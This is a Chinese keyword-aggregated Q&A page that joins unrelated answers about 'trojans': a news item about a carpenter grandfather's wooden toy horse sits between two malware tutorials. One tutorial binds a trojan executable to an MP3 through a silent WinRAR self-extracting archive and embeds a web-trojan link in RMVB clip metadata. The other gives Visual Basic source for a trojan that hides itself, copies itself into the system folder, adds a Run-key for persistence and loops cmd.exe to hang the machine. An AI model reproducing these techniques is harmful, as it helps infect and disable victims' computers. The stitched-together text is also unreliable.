本文目录一览:
视频文件和MP3如何制作成捆绑木马后的文件?又应该如何在这些文件中查杀病毒呢?
理论上来说可以,但视频文件与MP3文件由于大小太大,不适合捆绑木马。(捆绑木马后文件变成可执行文件,并先解压后才运行,解压时间很长。)
目前一般不采用捆绑法,而是通过在RMVB文件中添加剪辑信息来访问网页木马。
(这种方法处理后的文件依然是视频文件,无需解压便可运行。)
下面具体介绍这两种途径:
1、捆绑法
要求计算机安装WINRAR
准备好MP3文件和木马,选中这两个文件,点右键,选择“添加到压缩文件”
选择压缩方式为“存储”(解压速度较快),选择“创建自解压格式的文件”,
单击“注释”选项卡,假定你的MP3文件名为“123.mp3”,木马名为“MUMA.EXE”,那么你需要在注释中写入以下内容:
path=%systemroot%
savepath
Setup=muma.exe
setup=123.mp3
Silent=1
Overwrite=1
单击确定,产生一个压缩文件。
当运行这个文件时,会在你的系统目录下解压出这两个文件,并先后运行muma.exe与123.mp3
此文件图标为自解压文件图标,要想改动图标,请对此文件单击右键,选择“用WINRAR打开”,选择“高级自解压选项”,单击“文本和图标”选项卡,在“从文件选择自解压文件的图标”旁边的“浏览”按钮上单击,选择你喜欢的图标。
2、添加剪辑信息法:
(此资料来自)
步骤一:准备网页木马
首先需要准备一个网页木马,具体方法请自行搜索学习。
这里假设网页木马地址为“”。
步骤二:制作媒体信息文件
通过向RMVB影片中添加剪辑信息,可在视频播放时打开指定的木马网页。用记事本新建一个文本文件“muma.txt”,文件内容为:“u 00:01:00 00:01:00 ”,表示视频播放到1分钟时就自动打开指定的网页木马页面。
步骤三:将网页木马加入RMVB视频
下载安装“HelixProducerPlus9”程序,打开一个命令提示符窗口,执行如下命令即可将网页木马加入指定的RM视频中(如图1):
“"C:\Program Files\Real\Helix Producer Plus\RealMediaEditor\rmevents.exe" -i c:\龙虎门.rmvb -e xinxi.txt -o C:\龙虎门2.rmvb”
对两种方法的防范:
捆绑法:捆绑后的文件变为可执行文件。因此只要检查文件的后缀名,如果不是.MP3,而显示音乐文件的图标,就不要执行。一般,从网上下载的.EXE文件都要小心,不要轻易执行。
添加剪辑信息法:目前有工具可以删除影片中的剪辑信息,请自行搜索、下载。
木匠爷爷为孙子定制会跑的木马,此木马的原理是什么?
近日,在福建龙岩,一位69岁的木匠爷爷为自己的孙子制作了一匹会自己跑的木马,孙子骑着这样的木马在乡间小道上玩耍,成了一道靓丽的风景线,这匹木马也成了孩子独具特色的个人定制班玩具。
根据老爷爷的儿子金先生表示,这只木马父亲总共花了一个多星期才制作完成,自己的两个孩子非常喜欢。据金先生称,自己的父亲是一位具有五十多年经验的老木匠了,在退休之后老人赋闲在家,照顾孙子的同时也没忘记自己的老本行,他总是亲自动手给孙子们做一些木制的玩具,比如会自己走路的小鸟,木马之类的,老人的木匠活做的精细,玩具有趣又逼真,两个孩子都非常喜欢。这段孩子骑着木马在道路上玩耍的视频一发布便引来网友的热议,网友表示这样的爷爷真是令人羡慕,爷爷的手艺可以传承给孩子,这样的手艺一定要发扬光大。
从完整视频中,我们看到了这位老人亲自动手一点一点将木马做出来,老人布满老茧的双手拿着工具一点一点制作木马令人十分感动,,能够感受到爷爷对孙子的疼爱。这匹木马的制作原理并不是很复杂,木马的移动需要人力在前方进行牵引,但是与普通木马不同的是,由于爷爷在轮子上做了一些改动,这匹木马在被拖拽跑起来的时候会像真的马一样有起伏震动的感觉。两个孩子在马上骑着,感受到了木马的震动,笑得非常开心,虽然爷爷在前面拖着有点累,但是看到孙子开心的笑容整个人也都乐得合不拢嘴。
金先生说父亲看到邻居给小孩子买了一只木马,孙子们都很羡慕,随后老人就开始琢磨怎么给孙子做一个木马,在研究了一番之后,老人就开始寻找材料,动手制作,整个过程一周左右,所有的工艺也都是非常环保的,孙子能够玩得开心的同时还不会对身体造成危害,可谓用心良苦。
用VB怎么制作简单的木马视频
打开VB---
第一步,隐藏一下我们的小东西!
把Visible 设为False,这样打开程序,在桌面会看不到。
加入代码
App.TaskVisible = False
这样就在任务管理器中隐藏了。
第二步,写入自我复制代码
Dim f As String
f = App.Path "\" App.EXEName ".exe"
d = "C:\WINDOWS\SYSTEM\bo.exe" '这个bo.exe大家可以改下名,随便改。
FileCopy f, d
第三步,实现开机启动。
Set wsh = CreateObject("Wscript.Shell")
wsh.regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\xiaochouwanju", "C:\WINDOWS\SYSTEM\bo.exe" 'bo.exe要与上面相吻合。
加入这些代码就在注册表内让开机启动C:\WINDOWS\SYSTEM\bo.exe了,呵呵
第四步 让机器死机
Do
shell "cmd.exe"
loop
